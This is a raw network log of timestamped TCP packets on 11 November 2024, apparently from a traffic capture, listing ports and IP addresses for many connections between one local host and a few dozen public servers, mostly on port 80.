Nov 11, 2024 18:13:51.519686937 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.592993021 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.593012094 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.593058109 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.593099117 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:54.495050907 CET	59153	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:54.495141983 CET	59154	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:54.495165110 CET	59155	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:54.495198965 CET	59158	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:54.495230913 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:54.495264053 CET	59159	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:54.495280981 CET	59161	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:54.495289087 CET	59160	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:54.704638004 CET	59173	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:54.709649086 CET	80	59173	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:54.709719896 CET	59173	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:54.726907015 CET	59173	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:54.727695942 CET	59145	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:54.727725029 CET	59145	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:54.731703043 CET	80	59173	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:54.735618114 CET	59149	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:54.740571022 CET	80	59149	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:55.167536974 CET	80	59173	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:55.167613029 CET	59173	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:55.174103975 CET	80	59173	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:55.174151897 CET	59173	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:55.648443937 CET	59176	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:55.653491020 CET	80	59176	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:55.654706955 CET	59176	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:55.856605053 CET	59178	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:55.856630087 CET	59179	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:55.857040882 CET	59180	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:55.857161045 CET	59181	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:55.863522053 CET	80	59178	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:55.863537073 CET	80	59179	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:55.863595009 CET	59178	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:55.863617897 CET	59179	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:55.863801956 CET	80	59180	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:55.863851070 CET	59180	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:55.863954067 CET	80	59181	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:55.864005089 CET	59181	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:55.949146986 CET	59181	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:55.954143047 CET	80	59181	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:56.506236076 CET	80	59181	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:56.506333113 CET	59181	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:56.506666899 CET	80	59181	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:56.506676912 CET	80	59181	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:56.506731987 CET	59181	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:56.526042938 CET	59181	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:56.530998945 CET	80	59181	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:58.100131035 CET	80	59144	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:58.100243092 CET	59144	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:00.803812027 CET	59176	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:00.844219923 CET	56233	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:00.844994068 CET	56234	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:00.849076986 CET	80	56233	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:00.849175930 CET	56233	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:00.849796057 CET	80	56234	3.94.10.34	192.168.2.6
Nov 11, 2024 18:14:00.849992037 CET	56234	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:00.851273060 CET	56233	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:00.851361990 CET	56234	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:00.967616081 CET	59180	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:00.967902899 CET	59179	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:00.967953920 CET	59178	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:00.971327066 CET	56235	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:14:00.971893072 CET	56236	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:00.972373962 CET	56237	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:00.972435951 CET	80	59180	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:00.972714901 CET	80	59179	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:00.972907066 CET	56238	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:00.972913027 CET	80	59178	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:00.973165035 CET	56239	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:00.973362923 CET	56240	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:14:00.974456072 CET	56241	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:00.976211071 CET	80	56235	23.253.46.64	192.168.2.6
Nov 11, 2024 18:14:00.976555109 CET	56235	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:14:00.976905107 CET	80	56236	199.59.243.227	192.168.2.6
Nov 11, 2024 18:14:00.977660894 CET	80	56237	208.100.26.245	192.168.2.6
Nov 11, 2024 18:14:00.977729082 CET	56236	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:00.977730036 CET	56237	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:00.977756023 CET	80	56238	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:00.978275061 CET	80	56239	3.94.10.34	192.168.2.6
Nov 11, 2024 18:14:00.978327990 CET	56238	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:00.978410959 CET	80	56240	18.208.156.248	192.168.2.6
Nov 11, 2024 18:14:00.978436947 CET	56239	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:00.978436947 CET	56239	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:00.978454113 CET	56240	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:14:00.978504896 CET	56236	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:00.978547096 CET	56240	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:14:00.978593111 CET	56237	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:00.978631973 CET	56238	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:00.979264021 CET	80	56241	154.212.231.82	192.168.2.6
Nov 11, 2024 18:14:00.979711056 CET	56241	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:00.980814934 CET	56241	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:00.983217001 CET	80	56239	3.94.10.34	192.168.2.6
Nov 11, 2024 18:14:00.983488083 CET	80	56236	199.59.243.227	192.168.2.6
Nov 11, 2024 18:14:00.983498096 CET	80	56240	18.208.156.248	192.168.2.6
Nov 11, 2024 18:14:00.983509064 CET	80	56237	208.100.26.245	192.168.2.6
Nov 11, 2024 18:14:00.983526945 CET	80	56238	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:00.985568047 CET	80	56241	154.212.231.82	192.168.2.6
Nov 11, 2024 18:14:01.005676031 CET	56235	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:14:01.034667969 CET	56235	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:14:01.034718037 CET	59179	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:01.034785032 CET	56241	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:01.034857988 CET	59180	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:01.034877062 CET	59178	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:01.034910917 CET	56239	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:01.034930944 CET	56236	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:01.034998894 CET	56237	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:01.035022020 CET	56238	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:01.035083055 CET	56240	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:14:01.378519058 CET	80	59178	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:01.378559113 CET	80	59179	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:01.378623962 CET	59178	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:01.378726006 CET	59179	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:01.378757954 CET	80	59178	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:01.378767967 CET	80	59179	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:01.378808022 CET	59178	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:01.379059076 CET	80	59179	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:01.379070044 CET	80	59178	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:01.379086971 CET	59179	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:01.379214048 CET	59179	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:01.379693985 CET	59178	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:01.380672932 CET	443	59138	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:01.381377935 CET	80	59178	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:01.381443977 CET	59178	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:01.381464958 CET	80	59179	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:01.381478071 CET	80	59180	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:01.381498098 CET	59138	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:01.381508112 CET	59179	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:01.383985996 CET	59180	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:01.385627985 CET	80	56235	23.253.46.64	192.168.2.6
Nov 11, 2024 18:14:01.385910034 CET	56235	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:14:02.782314062 CET	59146	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:02.782387018 CET	59143	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:02.782416105 CET	59147	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:02.782438993 CET	59173	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:14:02.782461882 CET	59150	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:02.782506943 CET	59144	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:02.782526016 CET	59148	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:05.003355980 CET	63518	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:05.003439903 CET	63517	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:14:05.003634930 CET	63484	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:05.003712893 CET	63520	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:05.003870964 CET	63519	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:14:05.003874063 CET	63521	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:05.003976107 CET	63522	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:06.044694901 CET	50522	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:06.044842005 CET	64008	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:06.045042992 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:06.045279980 CET	59140	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:14:06.045344114 CET	50523	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:06.045591116 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:06.045746088 CET	59138	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:18.343576908 CET	80	58927	64.225.91.73	192.168.2.6
Nov 11, 2024 18:14:18.343652964 CET	58927	80	192.168.2.6	64.225.91.73
Nov 11, 2024 18:14:20.316660881 CET	80	58870	13.248.169.48	192.168.2.6
Nov 11, 2024 18:14:20.316770077 CET	58870	80	192.168.2.6	13.248.169.48
Nov 11, 2024 18:14:22.521580935 CET	80	61112	64.225.91.73	192.168.2.6
Nov 11, 2024 18:14:22.521667004 CET	61112	80	192.168.2.6	64.225.91.73
Nov 11, 2024 18:14:25.608285904 CET	80	49712	154.212.231.82	192.168.2.6
Nov 11, 2024 18:14:25.608452082 CET	49712	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:28.490195990 CET	80	62034	76.223.67.189	192.168.2.6
Nov 11, 2024 18:14:28.490271091 CET	62034	80	192.168.2.6	76.223.67.189
Nov 11, 2024 18:14:35.242436886 CET	8000	58882	106.15.232.163	192.168.2.6
Nov 11, 2024 18:14:35.242517948 CET	58882	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:14:37.563553095 CET	80	62037	154.85.183.50	192.168.2.6
Nov 11, 2024 18:14:37.563671112 CET	62037	80	192.168.2.6	154.85.183.50
Nov 11, 2024 18:14:50.416641951 CET	61112	80	192.168.2.6	64.225.91.73
Nov 11, 2024 18:14:50.421478987 CET	80	61112	64.225.91.73	192.168.2.6
Nov 11, 2024 18:14:50.443681955 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:14:50.443720102 CET	63478	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:50.471309900 CET	62034	80	192.168.2.6	76.223.67.189
Nov 11, 2024 18:14:50.476192951 CET	80	62034	76.223.67.189	192.168.2.6
Nov 11, 2024 18:14:50.477005005 CET	62037	80	192.168.2.6	154.85.183.50
Nov 11, 2024 18:14:50.481781006 CET	80	62037	154.85.183.50	192.168.2.6
Nov 11, 2024 18:14:50.510027885 CET	58927	80	192.168.2.6	64.225.91.73
Nov 11, 2024 18:14:50.510071039 CET	58882	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:14:50.514950991 CET	80	58927	64.225.91.73	192.168.2.6
Nov 11, 2024 18:14:50.514966965 CET	8000	58882	106.15.232.163	192.168.2.6
Nov 11, 2024 18:14:50.521647930 CET	58871	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:14:50.527023077 CET	80	58871	188.114.96.3	192.168.2.6
Nov 11, 2024 18:14:50.527086020 CET	58871	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:14:50.538933992 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:14:50.539019108 CET	58870	80	192.168.2.6	13.248.169.48
Nov 11, 2024 18:14:50.539058924 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:50.543817043 CET	80	58870	13.248.169.48	192.168.2.6
Nov 11, 2024 18:14:50.544307947 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:50.544352055 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:50.544538975 CET	58859	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:14:50.550287008 CET	80	58859	188.114.96.3	192.168.2.6
Nov 11, 2024 18:14:50.550339937 CET	58859	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:14:50.566005945 CET	49712	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:50.570822001 CET	80	49712	154.212.231.82	192.168.2.6
Nov 11, 2024 18:14:50.571142912 CET	63298	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:50.587903023 CET	49709	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:50.593159914 CET	80	49709	208.100.26.245	192.168.2.6
Nov 11, 2024 18:14:50.593224049 CET	49709	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:50.751274109 CET	63478	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:50.751351118 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:14:50.845026016 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:14:50.876302004 CET	63298	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:51.360661983 CET	63478	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:51.360671997 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:14:51.454416990 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:14:51.485836029 CET	63298	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:52.322880983 CET	64560	80	192.168.2.6	162.255.119.102
Nov 11, 2024 18:14:52.327790022 CET	80	64560	162.255.119.102	192.168.2.6
Nov 11, 2024 18:14:52.328135967 CET	64560	80	192.168.2.6	162.255.119.102
Nov 11, 2024 18:14:52.330401897 CET	64560	80	192.168.2.6	162.255.119.102
Nov 11, 2024 18:14:52.335134983 CET	80	64560	162.255.119.102	192.168.2.6
Nov 11, 2024 18:14:52.336230040 CET	64561	80	192.168.2.6	5.79.71.205
Nov 11, 2024 18:14:52.341028929 CET	80	64561	5.79.71.205	192.168.2.6
Nov 11, 2024 18:14:52.341156006 CET	64561	80	192.168.2.6	5.79.71.205
Nov 11, 2024 18:14:52.341296911 CET	64561	80	192.168.2.6	5.79.71.205
Nov 11, 2024 18:14:52.346014977 CET	80	64561	5.79.71.205	192.168.2.6
Nov 11, 2024 18:14:52.405625105 CET	64562	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:52.410444975 CET	80	64562	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:52.410851002 CET	64562	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:52.410851002 CET	64562	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:52.415659904 CET	80	64562	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:52.540719032 CET	64563	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:52.545564890 CET	80	64563	208.100.26.245	192.168.2.6
Nov 11, 2024 18:14:52.545628071 CET	64563	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:52.545742989 CET	64563	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:52.550565958 CET	80	64563	208.100.26.245	192.168.2.6
Nov 11, 2024 18:14:52.563776970 CET	63478	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:52.563791990 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:14:52.583965063 CET	64564	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:52.588813066 CET	80	64564	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:52.588874102 CET	64564	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:52.588963985 CET	64564	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:52.593797922 CET	80	64564	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:52.654478073 CET	64565	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:52.659414053 CET	80	64565	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:52.659471989 CET	64565	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:52.659631968 CET	64565	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:52.664457083 CET	80	64565	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:52.673171997 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:14:52.688810110 CET	63298	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:52.812526941 CET	64566	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:52.813308001 CET	64567	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:52.813308001 CET	64568	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:52.813558102 CET	64569	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:52.814587116 CET	64570	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:14:52.815284967 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:52.817456961 CET	80	64566	154.212.231.82	192.168.2.6
Nov 11, 2024 18:14:52.817533970 CET	64566	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:52.818248987 CET	80	64567	199.59.243.227	192.168.2.6
Nov 11, 2024 18:14:52.818274021 CET	80	64568	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:52.818361044 CET	64567	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:52.818461895 CET	80	64569	3.94.10.34	192.168.2.6
Nov 11, 2024 18:14:52.818492889 CET	64568	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:52.818509102 CET	64569	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:52.819348097 CET	80	64570	18.208.156.248	192.168.2.6
Nov 11, 2024 18:14:52.820122957 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:52.820190907 CET	64570	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:14:52.821517944 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:52.822504044 CET	64566	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:52.822596073 CET	64567	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:52.822777987 CET	64569	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:52.822851896 CET	64570	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:14:52.822868109 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:52.823091030 CET	64568	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:52.827392101 CET	80	64566	154.212.231.82	192.168.2.6
Nov 11, 2024 18:14:52.827403069 CET	80	64567	199.59.243.227	192.168.2.6
Nov 11, 2024 18:14:52.827496052 CET	80	64569	3.94.10.34	192.168.2.6
Nov 11, 2024 18:14:52.827599049 CET	80	64570	18.208.156.248	192.168.2.6
Nov 11, 2024 18:14:52.827621937 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:52.827843904 CET	80	64568	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:52.859977007 CET	80	64560	162.255.119.102	192.168.2.6
Nov 11, 2024 18:14:52.861243010 CET	64560	80	192.168.2.6	162.255.119.102
Nov 11, 2024 18:14:52.888762951 CET	64572	80	192.168.2.6	91.195.240.19
Nov 11, 2024 18:14:52.893589020 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:52.893678904 CET	64572	80	192.168.2.6	91.195.240.19
Nov 11, 2024 18:14:52.893867016 CET	64572	80	192.168.2.6	91.195.240.19
Nov 11, 2024 18:14:52.898653030 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.017271042 CET	80	64563	208.100.26.245	192.168.2.6
Nov 11, 2024 18:14:53.017385960 CET	64563	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:53.018652916 CET	80	64564	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:53.018805027 CET	64564	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:53.018868923 CET	64564	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:53.019323111 CET	64563	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:53.021559954 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:53.021605968 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:53.021851063 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:53.022139072 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:53.022150040 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:53.024931908 CET	80	64563	208.100.26.245	192.168.2.6
Nov 11, 2024 18:14:53.025079966 CET	80	64564	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:53.025131941 CET	64564	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:53.430680990 CET	80	64565	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:53.430733919 CET	80	64565	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:53.430821896 CET	64565	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:53.430828094 CET	80	64565	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:53.430891037 CET	80	64563	208.100.26.245	192.168.2.6
Nov 11, 2024 18:14:53.430908918 CET	64565	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:53.430947065 CET	64563	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:53.430967093 CET	80	64562	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:53.431031942 CET	80	64562	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:53.431041956 CET	80	64562	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:53.431060076 CET	64562	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:53.431093931 CET	64562	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:53.431093931 CET	64562	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:53.431220055 CET	80	64567	199.59.243.227	192.168.2.6
Nov 11, 2024 18:14:53.431252003 CET	80	64567	199.59.243.227	192.168.2.6
Nov 11, 2024 18:14:53.431265116 CET	80	64569	3.94.10.34	192.168.2.6
Nov 11, 2024 18:14:53.431277037 CET	80	64570	18.208.156.248	192.168.2.6
Nov 11, 2024 18:14:53.431329966 CET	64567	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:53.431340933 CET	64570	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:14:53.431340933 CET	80	64568	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:53.431340933 CET	64569	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:53.431351900 CET	80	64569	3.94.10.34	192.168.2.6
Nov 11, 2024 18:14:53.431365013 CET	80	64570	18.208.156.248	192.168.2.6
Nov 11, 2024 18:14:53.431375027 CET	80	64568	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:53.431382895 CET	64568	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:53.431396961 CET	64570	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:14:53.431397915 CET	64569	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:53.431412935 CET	80	64569	3.94.10.34	192.168.2.6
Nov 11, 2024 18:14:53.431423903 CET	80	64567	199.59.243.227	192.168.2.6
Nov 11, 2024 18:14:53.431435108 CET	80	64568	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:53.431435108 CET	64568	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:53.431447029 CET	80	64570	18.208.156.248	192.168.2.6
Nov 11, 2024 18:14:53.431471109 CET	64567	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:53.431472063 CET	64569	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:53.431490898 CET	64568	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:53.431490898 CET	64570	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:14:53.431519985 CET	80	64565	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:53.431586981 CET	80	64563	208.100.26.245	192.168.2.6
Nov 11, 2024 18:14:53.431627989 CET	64565	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:53.431629896 CET	64563	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:53.431693077 CET	80	64562	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:53.431924105 CET	64562	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:53.444261074 CET	64568	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:53.446280003 CET	64565	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:53.448378086 CET	64570	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:14:53.450633049 CET	64569	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:53.550996065 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:53.551045895 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:53.554735899 CET	64574	443	192.168.2.6	188.114.97.3
